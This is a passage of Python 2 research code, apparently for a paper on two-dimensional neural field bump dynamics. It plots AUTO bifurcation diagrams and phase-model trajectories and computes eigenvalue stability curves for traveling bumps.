xytext=(factor*xval[j-back_idx], factor*yval[j-back_idx]), textcoords='data',
size=15,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black')
)
axlist[i].set_xlim(-pi,pi)
axlist[i].set_ylim(-pi,pi)
axlist[i].tick_params(axis=u'both',which=u'both',length=0)
axlist[i].set_xticks(np.arange(-1,1+1,1)*pi)
axlist[i].set_yticks(np.arange(-1,1+1,1)*pi)
x_label = [r"$-\pi$", r"$0$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
axlist[i].set_xticklabels(x_label)
axlist[i].set_yticklabels(x_label)
if i >= 3:
axlist[i].yaxis.tick_right()
if i < 3:
axlist[i].set_yticklabels([])
if i >= 3 and i < len(labellist)-1:
axlist[i].set_xticklabels([])
# annotations corresponding to solution plots
ax21.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
ax11.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
axins21.annotate(labellist[i],
xy=(g, sxsval), xycoords='data',
xytext=(g, sxsval), textcoords='data',
size=12,
backgroundcolor='yellow',
zorder=-1,
horizontalalignment='right',
#arrowprops=dict(arrowstyle="-|>",
# connectionstyle="arc3",
# color=str(color)),
)
axlist[i].set_title(labellist[i])
#ax11.
ax11.scatter(g,sxsval,s=10,color='black',marker='^',zorder=2)
ax21.scatter(g,sxsval,s=10,color='black',marker='^',zorder=2)
axins21.scatter(g,sxsval,s=10,color='black',marker='^',zorder=2)
#axins11.scatter(g,sxsval,s=10,color='black',marker='^')
#ax2.plot(t,np.mod(sv[:,vn.index('x')],2*pi))
#ax2.plot(t,np.mod(sv[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('sxs')],2*pi))
#ax2.plot(t,np.mod(npa[:,vn.index('y')],2*pi))
return fig
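Both figure functions above open with the same block reducing AUTO "all info" rows to the simple (par, max, min, type, branch) layout that `diagram.read_diagram` expects. A reusable sketch of that conversion (column layout taken from the comments above; `sv_idx` is 1-based to match the `idx = 5` convention used for `sxs`, and `n_sv=10` is assumed):

```python
import numpy as np

def allinfo_to_simple(bif_data, sv_idx, n_sv=10):
    """Reduce AUTO all-info rows to (par, max, min, type, branch, 0).

    Assumed row layout: col 0 type, col 1 branch, col 3 parameter,
    col 5 period, then n_sv 'high' state-variable values followed by
    n_sv 'low' values, so the chosen variable's high value sits at
    column 5 + sv_idx (sv_idx counted 1-based, as in the code above).
    """
    simple = np.zeros((len(bif_data), 6))
    simple[:, 0] = bif_data[:, 3]                   # parameter value
    simple[:, 1] = bif_data[:, 5 + sv_idx]          # max of chosen sv
    simple[:, 2] = bif_data[:, 5 + sv_idx + n_sv]   # min of chosen sv
    simple[:, 3] = bif_data[:, 0]                   # point type
    simple[:, 4] = np.abs(bif_data[:, 1])           # branch number
    return simple

# one synthetic row: 6 header values, 10 highs (100..109), 10 lows (200..209)
row = [4.0, -2.0, 0.0, 0.7, 0.35, 12.0] \
    + [100.0 + k for k in range(10)] + [200.0 + k for k in range(10)]
simple = allinfo_to_simple(np.array([row]), sv_idx=5)
```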
def twod_phase_auto_5terms_fig():
"""
twod bifurcation diagram for truncated h
"""
#raw_data = np.loadtxt('twodphs_cys_wave_diagram_q=.125.dat')
sv = 'cys'
qval = '.5'
raw_data = np.loadtxt('twodphs_5_'+sv+'_HB_q='+qval+'.dat')
raw_data2 = np.loadtxt('twodphs_5_'+sv+'_TR_q='+qval+'.dat')
data = diagram.read_diagram(raw_data)
data2 = diagram.read_diagram(raw_data2)
fig = plt.figure()
ax = fig.add_subplot(111)
# plot unstable fixed points
ax.scatter(data[:,0],data[:,2],s=10,color='black')
ax.scatter(data[:,0],data[:,6],s=10,color='black')
#ax.scatter(data3[:,0],data3[:,2],s=10,color='black')
#ax.scatter(data3[:,0],data3[:,6],s=10,color='black')
# plot unstable periodic solutions
ax.scatter(data[:,0],data[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data[:,0],data[:,8],s=10,facecolor='none',edgecolor='blue')
# plot traveling waves
ax.scatter(data2[:,0],data2[:,4],s=10,facecolor='none',edgecolor='#0099ff')
ax.scatter(data2[:,0],data2[:,8],s=10,facecolor='none',edgecolor='#0099ff')
#ax.scatter(data3[:,0],data3[:,4],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data3[:,0],data3[:,8],s=10,facecolor='none',edgecolor='blue')
#ax.scatter(data4[:,0],data4[:,4],s=10,facecolor='none',edgecolor='#0099ff')
#ax.scatter(data4[:,0],data4[:,8],s=10,facecolor='none',edgecolor='#0099ff')
# plot stable fixed points
ax.scatter(data[:,0],data[:,1],s=10,color='red')
ax.scatter(data[:,0],data[:,5],s=10,color='red')
#ax.scatter(data3[:,0],data3[:,1],s=10,color='red')
#ax.scatter(data3[:,0],data3[:,5],s=10,color='red')
# plot stable periodic solutions
ax.scatter(data[:,0],data[:,3],s=20,color='green')
ax.scatter(data[:,0],data[:,7],s=20,color='green')
# plot stable traveling waves
ax.scatter(data2[:,0],data2[:,3],s=20,color='#00cc00')
ax.scatter(data2[:,0],data2[:,7],s=20,color='#00cc00')
#ax.scatter(data3[:,0],data3[:,3],s=20,color='green')
#ax.scatter(data3[:,0],data3[:,7],s=20,color='green')
#ax.scatter(data4[:,0],data4[:,3],s=20,color='#00cc00')
#ax.scatter(data4[:,0],data4[:,7],s=20,color='#00cc00')
#ax.set_xlim(.5,3)
#ax.set_ylim(.5,1.)
ax.set_title('q='+qval)
ax.set_ylabel(sv)
return fig
def twod_phase_auto_3terms_2par():
"""
twod, 2par bifurcation diagram
"""
data = np.loadtxt('twodphs_3_2par.dat')
data2 = np.loadtxt('twodphs_3_2par_TR.dat')
# separate by branches
# point type codes: 2 = LP, 3 = HB, 4 = TR, 5 = BP, 6 = PD
TR = data2[(data2[:,-1]==4)]
PD = data[(data[:,-1]==6)*(data[:,-2]<9)]
PD_gray = data[(data[:,-1]==6)*(data[:,-2]>=9)*(data[:,-2]<=11)]
LP = data[data[:,-1]==2]
HB = data[data[:,-1]==3]
BP = data[data[:,-1]==5]
# remove discontinuities
TRx,TRy = clean(TR[:,0],TR[:,1],tol=.05)
PDx,PDy = clean(PD[:,0],PD[:,1],tol=.05)
PD_gx,PD_gy = clean(PD_gray[:,0],PD_gray[:,1],tol=.05)
LPx,LPy = clean(LP[:,0],LP[:,1],tol=.05)
HBx,HBy = clean(HB[:,0],HB[:,1],tol=.05)
BPx,BPy = clean(BP[:,0],BP[:,1],tol=.05)
fig = plt.figure(figsize=(5,5))
ax = fig.add_subplot(111)
ax.plot([0,2],[.1,.1],color='gray')
ax.plot(PD_gx,PD_gy,color='.35',lw=2,ls='--',dashes=(4,1))
ax.plot(TRx,TRy,color='red',lw=2)
ax.plot(PDx,PDy,color='black',lw=2)
ax.plot(HBx,HBy,color='orange',ls='--',lw=2)
ax.plot(LPx,LPy,color='purple',ls='-.',lw=2)
ax.plot(BPx,BPy,color='blue',ls='',marker='1',ms=10,lw=2)
ax.set_xlabel(r'$g$')
ax.set_ylabel(r'$q$')
# label regions
ax.annotate('1. Stationary Bump',
xy=(.5, .55), xycoords='data',
xytext=(.5, .55), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('2. Wobbling Bump',
xy=(1.2, .35), xycoords='data',
xytext=(1.2, .35), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('3. Sloshing and Chaos',
xy=(1.1, .15), xycoords='data',
xytext=(1.1, .25), textcoords='data',
size=12,
zorder=-1,
rotation=30
)
ax.annotate('4. Chaos',
xy=(1.1, .15), xycoords='data',
xytext=(1.3, .11), textcoords='data',
size=12,
zorder=-1,
rotation=22
)
# label branches
ax.annotate('LP1',
xy=(1.9, .35), xycoords='data',
xytext=(1.9, .35), textcoords='data',
size=12,
color='purple',
zorder=-1
)
ax.annotate('HB',
xy=(1.15, .57), xycoords='data',
xytext=(1.15, .57), textcoords='data',
size=12,
color='orange',
zorder=-1
)
ax.annotate('PD1',
xy=(1.616, .1), xycoords='data',
xytext=(1.5, .13), textcoords='data',
size=12,
color='black',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax.annotate('PD2',
xy=(1.728, .1), xycoords='data',
xytext=(1.7, .15), textcoords='data',
size=12,
color='black',
zorder=-1,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax.annotate('PD3',
xy=(1.81, .1), xycoords='data',
xytext=(1.85, .18), textcoords='data',
size=12,
color='black',
zorder=3,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax.annotate('LP2',
xy=(1.8, .06), xycoords='data',
xytext=(1.8, .06), textcoords='data',
size=12,
color='purple',
zorder=-1
)
ax.annotate('BP1',
xy=(1., .06), xycoords='data',
xytext=(1., .06), textcoords='data',
size=12,
color='blue',
zorder=-1
)
ax.annotate('PD4,5',
xy=(1.75, .1), xycoords='data',
xytext=(1.6, .02), textcoords='data',
size=12,
color='.25',
zorder=-1,
arrowprops=dict(arrowstyle="wedge,tail_width=.7",
connectionstyle="arc3",
color='.25'),
)
ax.annotate('TR2',
xy=(1.2, .125), xycoords='data',
xytext=(1.2, .125), textcoords='data',
size=12,
color='red',
zorder=-1
)
ax.set_xlim(.48,2.)
ax.set_ylim(0,.6)
return fig
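The branch separation above ANDs boolean masks by multiplying them, e.g. `data[(data[:,-1]==6)*(data[:,-2]<9)]`. The idiomatic NumPy spelling is `&`, with parentheses around each comparison since `&` binds tighter. A sketch, assuming the last two columns are branch number and point-type code as the comments state:

```python
import numpy as np

# toy rows: [par, q, branch, type]; type codes 2=LP, 3=HB, 4=TR, 5=BP, 6=PD
data = np.array([
    [1.0, 0.1, 3.0, 6.0],   # PD on branch 3
    [1.2, 0.2, 9.0, 6.0],   # PD on branch 9 (excluded below)
    [1.4, 0.3, 1.0, 2.0],   # LP
])
# PD points on low-numbered branches, written with & instead of *
PD = data[(data[:, -1] == 6) & (data[:, -2] < 9)]
```

Multiplying boolean arrays gives the same result, but `&` states the intent and avoids surprises if a mask is ever an integer array.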
def get_solution(g,q,init,per,dt=1.):
"""
integrate full2dbump.ode and return the wrapped bump position (xval,yval). specialized function for twod_full_auto_5terms_2par.
"""
npa, vn = xpprun('full2dbump.ode',
xppname='xppaut',
inits={'a0':init[0],'a10':init[1],
'a01':init[2],'a11':init[3],
'b10':init[4],'b01':init[5],
'b11':init[6],'c11':init[7],'d11':init[8],
'e0':init[9],'e10':init[10],
'e01':init[11],'e11':init[12],
'f10':init[13],'f01':init[14],
'f11':init[15],'g11':init[16],'h11':init[17]
},
parameters={'total':per,
'g':g,
'q':q,
'eps':.05,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
idx = vn.index('a11')
#print idx, vn
b01 = sv[:,vn.index('b01')]
a01 = sv[:,vn.index('a01')]
b10 = sv[:,vn.index('b10')]
a10 = sv[:,vn.index('a10')]
xval = np.mod(np.arctan2(b01,a01)+5*pi,2*pi)-pi
yval = np.mod(np.arctan2(b10,a10)+5*pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos1] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
return xval,yval
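`get_solution` recovers the bump position from the Fourier amplitudes as the phase of each (a, b) pair via `arctan2`, then re-wraps it to (-pi, pi). The `+5*pi` is just `+pi` plus two full turns, added so the argument to `np.mod` is positive; the two forms are identical. A minimal check of both the recovery and that identity:

```python
import numpy as np

# a bump at position theta has cosine/sine amplitudes (cos theta, sin theta)
theta = np.linspace(-np.pi + 1e-6, np.pi - 1e-6, 101)
a, b = np.cos(theta), np.sin(theta)

# phase extraction exactly as written in get_solution()
recovered = np.mod(np.arctan2(b, a) + 5 * np.pi, 2 * np.pi) - np.pi
# equivalent wrap with a single +pi, since 4*pi is two full turns
recovered2 = np.mod(np.arctan2(b, a) + np.pi, 2 * np.pi) - np.pi
```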
def get_solution_phase(g,q,init,per,dt=1.):
"""
integrate twodphs3.ode and return the wrapped phase-model position (xval,yval). specialized function for twod_phase_2par.
"""
npa, vn = xpprun('twodphs3.ode',
xppname='xppaut',
inits={'x':init[0],'y':init[1],
'cxs':init[2],'cys':init[3],
'sxs':init[4],'sys':init[5],
'sxsys':init[6],'sxcys':init[7],
'cxsys':init[8],'cxcys':init[9]},
parameters={'total':per,
'g':g,
'q':q,
'eps':.05,
'dt':dt},
clean_after=True)
t = npa[:,0]
sv = npa[:,1:]
xval = np.mod(sv[:,vn.index('x')]+pi,2*pi)-pi
yval = np.mod(sv[:,vn.index('y')]+pi,2*pi)-pi
pos1 = np.where(np.abs(np.diff(xval)) >= 1)[0]
pos2 = np.where(np.abs(np.diff(yval)) >= 1)[0]
xval[pos1] = np.nan
yval[pos1] = np.nan
xval[pos2] = np.nan
yval[pos2] = np.nan
return xval,yval
def twod_phase_2par(subplots=1):
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(3,3)
ax = plt.subplot(gs[:2,:2])
data = np.loadtxt('twodphs_3_2par.dat')
data2 = np.loadtxt('twodphs_3_2par_TR.dat')
# separate by branch type
# type codes used below: 2 = LP, 3 = HB, 4 = TR, 5 = BP, 6 = PD
TR = data2[(data2[:,-1]==4)]
PD = data[(data[:,-1]==6)*(data[:,-2]<9)]
PD_gray = data[(data[:,-1]==6)*(data[:,-2]>=9)*(data[:,-2]<=11)]
LP = data[data[:,-1]==2]
HB = data[data[:,-1]==3]
BP = data[data[:,-1]==5]
# remove discontinuities
TRx,TRy = clean(TR[:,0],TR[:,1],tol=.05)
PDx,PDy = clean(PD[:,0],PD[:,1],tol=.05)
PD_gx,PD_gy = clean(PD_gray[:,0],PD_gray[:,1],tol=.05)
LPx,LPy = clean(LP[:,0],LP[:,1],tol=.05)
HBx,HBy = clean(HB[:,0],HB[:,1],tol=.05)
BPx,BPy = clean(BP[:,0],BP[:,1],tol=.05)
#fig = plt.figure(figsize=(5,5))
#ax = fig.add_subplot(111)
#ax.plot([0,2],[.1,.1],color='gray')
#ax.plot(PD_gx,PD_gy,color='.35',lw=2,ls='--',dashes=(4,1))
#ax.plot(TRx,TRy,color='red',lw=2)
#ax.plot(PDx,PDy,color='black',lw=2)
ax.plot(HBx,HBy,color='orange',ls='--',lw=2)
ax.plot(LPx[:100],LPy[:100],color='purple',ls='-.',lw=2)
#ax.plot(BPx,BPy,color='blue',ls='',marker='1',ms=10,lw=2)
ax.set_xlabel(r'$g$')
ax.set_ylabel(r'$q$')
# label regions
ax.annotate('1. Stationary Bump',
xy=(.5, .55), xycoords='data',
xytext=(.5, .55), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('2. Wobbling Bump',
xy=(1.2, .35), xycoords='data',
xytext=(1.2, .35), textcoords='data',
size=12,
zorder=-1
)
ax.annotate('3. Chaos',
xy=(1.1, .15), xycoords='data',
xytext=(1.3, .11), textcoords='data',
size=12,
zorder=-1
)
# label branches
ax.annotate('LP1',
xy=(1.9, .35), xycoords='data',
xytext=(1.9, .35), textcoords='data',
size=12,
color='purple',
zorder=-1
)
ax.annotate('HB',
xy=(1.15, .57), xycoords='data',
xytext=(1.15, .57), textcoords='data',
size=12,
color='orange',
zorder=-1
)
# plot solutions
#
#########################################################################################
if subplots >= 1:
ax13 = plt.subplot(gs[0,-1])
x,y = get_solution_phase(0.,0.,np.zeros(18),1000,dt=1.)
ax13.set_title(r"\textbf{(a)}",x=0.1)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
ax13.scatter(x,y,color='black')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(-pi,pi)
ax13.set_xticks([])
ax13.set_yticks([])
#ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
#ax13.set_yticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
#ax13.set_xticklabels(x_label)
ax.annotate('', xy=(.2, .7), xycoords='axes fraction', xytext=(1.07, 1.02),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 2:
bif_data = np.loadtxt('twodphs_3_HB_PD_q=.1_appended.dat')
init_data = np.loadtxt('twodphs_3_init_HB_PD_q=.1_appended.dat')
rlist = [540]
rown = rlist[0]
g = bif_data[rown,3]
per = bif_data[rown,5]
init = init_data[rown,5:]
dt = .01
ax23 = plt.subplot(gs[1,-1])
x,y = get_solution_phase(g,.1,init,per,dt=dt)
ax23.set_title(r"\textbf{(b)}",x=0.1)
ax23.xaxis.tick_bottom()
ax23.xaxis.set_label_position('bottom')
ax23.plot(x,y)
ax23 = beautify_phase(ax23,x,y,per,dt)
ax23.set_xlim(-pi,pi)
ax23.set_ylim(-pi,pi)
ax23.set_xticks([])
ax23.set_yticks([])
ax.annotate('', xy=(.8, .7), xycoords='axes fraction', xytext=(1.07, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 3:
ax33 = plt.subplot(gs[2,-1])
np.random.seed(0)
x,y = get_solution_phase(2.,0.,np.random.randn(18),100,dt=.02)
ax33.set_title(r"\textbf{(c)}",x=0.1)
ax33.xaxis.tick_bottom()
ax33.xaxis.set_label_position('bottom')
xf = x[-int(10/.02):]
yf = y[-int(10/.02):]
ax33.plot(xf,yf,lw=3,color='black')
ax33 = beautify_phase(ax33,xf,yf,10,.02,arrows=5)
ax33.set_xlim(-pi,pi)
ax33.set_ylim(-pi,pi)
ax33.set_xticks([])
ax33.set_yticks([])
ax.annotate('', xy=(.8, .01), xycoords='axes fraction', xytext=(1.07, -.2),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 4:
ax32 = plt.subplot(gs[-1,-2])
x,y = get_solution_phase(1.5,.1,np.random.randn(18),100,dt=.05)
ax32.set_title(r"\textbf{(d)}",x=0.1)
ax32.xaxis.tick_bottom()
ax32.xaxis.set_label_position('bottom')
xf = x[-int(30/.05):]
yf = y[-int(30/.05):]
ax32.plot(xf,yf,lw=3,color='black')
ax32 = beautify_phase(ax32,xf,yf,30,.05,arrows=4)
ax32.set_xlim(-pi,pi)
ax32.set_ylim(-pi,pi)
ax32.set_xticks([])
ax32.set_yticks([])
ax.annotate('', xy=(.75, .32), xycoords='axes fraction', xytext=(.65, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
ax.set_xlim(.48,2.)
ax.set_ylim(0,.6)
return fig
def fac(nu,s0=0.,s1=10.,sn=101):
"""
nu/int e^-s H1(nu s,0)ds
"""
sarr = np.linspace(s0,s1,sn)
ds = sarr[1] - sarr[0] # step consistent with the linspace grid
g_denom = 0.
for s in sarr:
g_denom += np.exp(-s)*f2d.H1_fourier(nu*s,0)*ds
#print f2d.H1_fourier(nu*s,0)
#print g_denom
return nu/g_denom
def ix(nu,lam,choice=1,s0=0.,s1=10.,sn=101):
sarr = np.linspace(s0,s1,sn)
ds = sarr[1] - sarr[0] # step consistent with the linspace grid
i = 0.
for s in sarr:
if choice == 1:
h1x,h1y = f2d.H1_fourier(nu*s,0,d=True)
else:
h1x,h1y = f2d.H1_fourier(0,nu*s,d=True)
i += np.exp(-s)*h1x*((np.exp(-lam*s)-1)/lam)*ds
return i
def L(nu,lam,choice=1,s0=0.,s1=40.,sn=501):
"""
L1 = 1 + g int_0^\infty e^-s \pa H_1/\pa x (nu s, 0) (e^{-\lambda s} - 1)/\lambda ds
"""
sarr = np.linspace(s0,s1,sn)
ds = sarr[1] - sarr[0] # step consistent with the linspace grid
g_denom = 0.
for s in sarr:
g_denom += np.exp(-s)*f2d.H1_fourier(nu*s,0)*ds
#print f2d.H1_fourier(nu*s,0)
#print g_denom
factor = nu/g_denom
i = 0.
for s in sarr:
if choice == 1:
h1x,h1y = f2d.H1_fourier(nu*s,0,d=True)
else:
h1x,h1y = f2d.H1_fourier(0,nu*s,d=True)
i += np.exp(-s)*h1x*((np.exp(-lam*s)-1.)/lam)*ds
return 1. + factor*i
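The quadrature in `L` can be sanity-checked against a case with a known closed form: replacing the coupling H1 by the constant 1 (a hypothetical toy case, not the model's H1) gives \int_0^\infty e^{-s}(e^{-\lambda s}-1)/\lambda ds = -1/(1+\lambda), so L collapses to 1 - nu/(1+lam). A sketch of that check:

```python
import numpy as np

def L_toy(nu, lam, s1=40., sn=2001):
    # Same structure as L() above, but with the coupling H1 replaced by
    # the constant 1 (toy case with a known closed-form answer).
    s = np.linspace(0., s1, sn)
    g_denom = np.trapz(np.exp(-s), s)                       # ~ 1
    i = np.trapz(np.exp(-s)*(np.exp(-lam*s) - 1.)/lam, s)   # ~ -1/(1+lam)
    return 1. + (nu/g_denom)*i

val = L_toy(0.5, 0.2)   # closed form: 1 - 0.5/1.2
```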
def L_ana(nu,lam,choice=1):
"""
analytic version of above. found using long but finite fourier truncation
"""
print 'using analytic L1,L2'
g = (1/(1.04609467947464/(1 + nu**2) + 0.06989538102574108/(1 + 4*nu**2) +
5.002469208435e-6/(1 + 9*nu**2)))
if choice == 1:
integral = (-1.04609467947464/(1 + nu**2) - 0.06989538102574108/(1 + 4*nu**2) -
5.002469208435e-6/(1 + 9*nu**2) +
(1.04609467947464*(1 + lam))/(nu**2 + (1 + lam)**2) +
(0.06989538102574108*(1 + lam))/(4*nu**2 + (1 + lam)**2) +
(5.002469208435e-6*(1 + lam))/(9*nu**2 + (1 + lam)**2))/lam
if choice == 2:
integral = (-0.6474559245027758 - 0.46310403788291776/(1 + nu**2) -
0.005435100583895982/(1 + 4*nu**2) + 0.6474559245027758/(1. + lam) +
(0.46310403788291776*(1 + lam))/(nu**2 + (1 + lam)**2) +
(0.005435100583895982*(1 + lam))/(4*nu**2 + (1 + lam)**2))/lam
return 1 + g*integral
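The fixed coefficients in `L_ana` come from integrating each Fourier mode of H1 against the exponential kernel via the Laplace transform \int_0^\infty e^{-s}\cos(n\nu s)\,ds = 1/(1+n^2\nu^2), which is where the 1/(1 + nu**2), 1/(1 + 4*nu**2), ... denominators originate. A quick numerical confirmation of that identity:

```python
import numpy as np

# int_0^inf e^{-s} cos(n*nu*s) ds = 1/(1 + (n*nu)**2), checked for n=2, nu=0.7
nu, n = 0.7, 2
s = np.linspace(0., 60., 60001)
numeric = np.trapz(np.exp(-s)*np.cos(n*nu*s), s)
closed = 1./(1. + (n*nu)**2)
```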
def wave_stbl_2d(choice='axial'):
"""
compute eigenvalue as a function of traveling bump velocity in axial or diagonal directions.
\lambda_1 &= -\frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa x}(\nu s, 0)[e^{-\lambda_1 s}-1]ds,\\
\lambda_2 &= \frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa y}(0, \nu s)[e^{-\lambda_2 s}-1]ds.
"""
fig = plt.figure(figsize=(8,3))
ax = fig.add_subplot(121)
nu = np.linspace(.001,1.5,200)
lam = np.linspace(-.98,.98,200)
X,Y = np.meshgrid(nu,lam,indexing='xy')
#L(nu,lam,choice=1,s0=0,s1=10,sn=101):
z = L(X,Y)
z[z>=5] = 5
z[z<=-5] = -5
ax.plot([0,10],[0,0],color='gray')
cs = ax.contour(X,Y,z,levels=[-0.00001,0.,.00001])
# remove other curves
# customize desired curve
cs.collections[0].set_color('black')
cs.collections[1].set_color('black')
cs.collections[2].set_color('black')
cs.collections[1].set_linewidth(2)
#cbar = plt.colorbar(cs)
#cbar.add_lines(cs)
ax.set_ylabel(r'$\lambda_1$')
ax.set_xlabel(r'$\nu$')
#ax.annotate(r'Stability of solution $\theta_1(\tau)=\nu\tau$',xy=(5.1,.75))
#ax.annotate(r'Unstable',xy=(7.2,.05))
#ax.annotate(r'Stable',xy=(7.2,-.12))
ax2 = fig.add_subplot(122)
#nu = np.linspace(0,1.5,150)
lam = np.linspace(-.25,.25,150)
X,Y = np.meshgrid(nu,lam,indexing='xy')
z2 = L_ana(X,Y,choice=2)
z2[z2>=5] = 5
z2[z2<=-5] = -5
ax2.plot([0,10],[0,0],color='gray')
cs2 = ax2.contour(X,Y,z2,levels=[-0.00001,0.,.00001])
cs2.collections[0].set_color('black')
cs2.collections[1].set_color('black')
cs2.collections[2].set_color('black')
cs2.collections[1].set_linewidth(2)
#ax2.annotate(r'Stability of solution $\theta_2(\tau)=0$',xy=(.1,.9))
#ax2.annotate(r'Unstable',xy=(1.25,.019))
#ax2.annotate(r'Stable',xy=(1.25,-.028))
ax2.set_ylabel(r'$\lambda_2$')
ax2.set_xlabel(r'$\nu$')
ax.set_xlim(0,1.5)
ax2.set_xlim(0,1.5)
ax2.set_ylim(-.1,.25)
#ax2.set_ylabel(r'$\nu$')
#p = cs.collections[0].get_paths()[1]
#v = p.vertices
#cbar2 = plt.colorbar(cs2)
#cbar2.add_lines(cs2)
#fig.set_clabel(cs, inline=1, fontsize=10)
#print fig.__dict__
#ax.plot(v[:,0],v[:,1],color='black')
return fig
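The contour calls above draw the zero level set of L by contouring at levels [-1e-5, 0, 1e-5] and bolding the middle curve; the same zero set can also be read back numerically from the ContourSet. A small headless demo of that extraction, using the unit circle as a stand-in test function:

```python
import matplotlib
matplotlib.use('Agg')            # headless backend for scripted use
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(-2., 2., 400)
X, Y = np.meshgrid(x, x)
cs = plt.contour(X, Y, X**2 + Y**2 - 1., levels=[0.])
verts = np.vstack(cs.allsegs[0])          # vertices of the 0-level set
radii = np.hypot(verts[:, 0], verts[:, 1])
```

Reading `allsegs` avoids the `cs.collections[i].get_paths()` route used in the commented-out lines above.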
def L_gauss(nu,lam,choice=1,sig=5.):
"""
gaussian eigenvalue problem
"""
L1 = 1 + (5*nu**4*\
((4*lam*Sqrt(nu**2))/5. + (2*E**((4*Pi**2)/25.)*lam*Sqrt(nu**2))/5. + \
Sqrt(Pi)*(E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Erfc(5/(2.*Sqrt(nu**2))) - \
E**((25*(1 + lam)**2)/(4.*nu**2) + (4*Pi**2)/25.)*(1 + lam)**2*\
Erfc((5*(1 + lam))/(2.*Sqrt(nu**2))) + \
E**((25 - 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 - 4*nu*Pi)/(10.*Sqrt(nu**2))) - \
E**((25*(1 + lam) - 4*nu*Pi)**2/(100.*nu**2))*(1 + lam)**2*\
Erfc((25*(1 + lam) - 4*nu*Pi)/(10.*Sqrt(nu**2))) + \
E**((25 + 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 + 4*nu*Pi)/(10.*Sqrt(nu**2)))) - \
E**((25*(1 + lam) + 4*nu*Pi)**2/(100.*nu**2))*(1 + lam)**2*Sqrt(Pi)*\
Erfc((25*(1 + lam) + 4*nu*Pi)/(10.*Sqrt(nu**2)))))/\
(lam*(nu**2)**1.5*(2*(2 + E**((4*Pi**2)/25.))*nu**2 - \
5*E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Sqrt(nu**2)*Sqrt(Pi)*(1 + 2*Cosh((2*Pi)/nu)) + \
5*E**((25 - 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*\
(E**((2*Pi)/nu)*Erf(5/(2.*nu)) + Erf(5/(2.*nu) - (2*Pi)/5.)) + \
5*E**((25 + 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*Erf(5/(2.*nu) + (2*Pi)/5.)))
L2 = 1 - (2*(nu**2)**1.5*Sqrt(Pi)*(25*(2 + E**((4*Pi**2)/25.)) - 16*Pi**2)*\
(E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Erfc(5/(2.*Sqrt(nu**2))) - \
E**((25*(1 + lam)**2)/(4.*nu**2) + (4*Pi**2)/25.)*Erfc((5*(1 + lam))/(2.*Sqrt(nu**2))) + \
E**((25 - 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 - 4*nu*Pi)/(10.*Sqrt(nu**2))) - \
E**((25*(1 + lam) - 4*nu*Pi)**2/(100.*nu**2))*\
Erfc((25*(1 + lam) - 4*nu*Pi)/(10.*Sqrt(nu**2))) + \
E**((25 + 4*nu*Pi)**2/(100.*nu**2))*Erfc((25 + 4*nu*Pi)/(10.*Sqrt(nu**2))) - \
E**((25*(1 + lam) + 4*nu*Pi)**2/(100.*nu**2))*\
Erfc((25*(1 + lam) + 4*nu*Pi)/(10.*Sqrt(nu**2)))))/\
(125.*(2 + E**((4*Pi**2)/25.))*lam*\
(2*(2 + E**((4*Pi**2)/25.))*nu**2 - \
5*E**(25/(4.*nu**2) + (4*Pi**2)/25.)*Sqrt(nu**2)*Sqrt(Pi)*(1 + 2*Cosh((2*Pi)/nu)) + \
5*E**((25 - 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*\
(E**((2*Pi)/nu)*Erf(5/(2.*nu)) + Erf(5/(2.*nu) - (2*Pi)/5.)) + \
